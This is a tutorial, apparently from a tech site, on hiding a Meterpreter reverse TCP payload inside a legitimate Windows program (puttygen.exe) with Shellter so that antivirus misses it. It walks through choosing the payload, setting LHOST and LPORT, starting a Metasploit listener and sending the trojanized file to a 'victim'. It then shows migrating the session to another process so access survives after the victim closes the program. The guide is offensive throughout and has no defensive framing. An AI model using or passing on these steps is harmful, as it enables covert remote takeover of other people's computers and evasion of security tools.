How to Make a Fully Undetected Backdoored Program

Oct 1, 2015 07:02 PM

Oct 1, 2015 07:03 PM

ASCII art representation of a funnel, with text indicating "Shelter V 15-11" and options for operating modes.

You always wanted to make an undetected payload and make it look legit, Well this is what this tutorial is about, You're going to learn how to backdoor any (Unfortunately only 32-Bit) software, Let's get into it

Download Shellter

First of all, Head to Shellter download page and download it, then extract the folder, Don't use apt-get shellter since it will download an older version

Download instructions for Shelter software, including license agreement and system compatibility details.

Backdooring a Software

After downloading head to the folder where you extracted Shellter, then run the executable "i assume you got wine installed" You will get this screen

ASCII art representation of a funnel with text indicating "Shelter V 15:11" and operational modes.

We will chose Auto mode for now, you can experiment by yourself later, After choosing Auto you will be asked to put the directory of the file we want to backdoor, In my case its

/root/Desktop/puttygen.exe

After that press enter

ASCII art representation of a computer command line interface displaying the software 'Blahlicious v1.5.3'.

We now wait until we get the second prompt

Terminal window displaying the initialization and configuration of a software tool, including tracing mode instructions.

After waiting for a while we get to choose the payload, you can import custom payloads too, we will use the popular windows/meterpreter/reverse tcp

Code snippet displaying network payload options in a terminal interface.

Type L then choose the payload number, in my case it's 1, then set the LHOST using your ip and LPORT with the port number you're going to use

Terminal displaying a payload listing and connection details.

After doing so the tool will handle the rest, after a while the software will get backdoored:

How to Make a Fully Undetected Backdoored Program

Alright, moving to the next step.

Set-Up the Listener

After backdooring the software we will setup the listener, run msfconsole then use the multi/handler

and set the payload as "windows/meterpreter/reverse tcp" Then set the "LHOST" and "LPORT" (they should be the same as the ones we used in Shellter) and Finally make sure everything is right using "show options"

After everything is done and set-up correctly we run the listener using "run" or "exploit" command

Reverse shell command execution in terminal.

Good, moving to step 4.

Send the File to the Victim

After setting up everything, we should send the file to the victim and wait for him to open it

PuTTY Key Generator interface showing options to generate SSH keys.

Now here comes the tricky part, as soon as he opens the file we should have a Meterpreter session

As soon as he closes the file we lose the session, so whenever the victim opens the file and the sessions pops up you should get the processes list using "ps" command and migrate the session to another process

Directory listing of files on a computer.

Now migrate to one of the processes

Command line output showing successful migration from process 2096 to 3472 in Metasploit.

Now even if he closes the file we're still in.

Have Fun

That's it, Have fun backdooring softwares

System information displayed in a command line interface, showing computer details and user information.

You already know how to use your phone. With Gadget Hacks' newsletter, we'll show you how to master it. Each week, we explore features, hidden tools, and advanced settings that give you more control over iOS and Android than most users even know exists.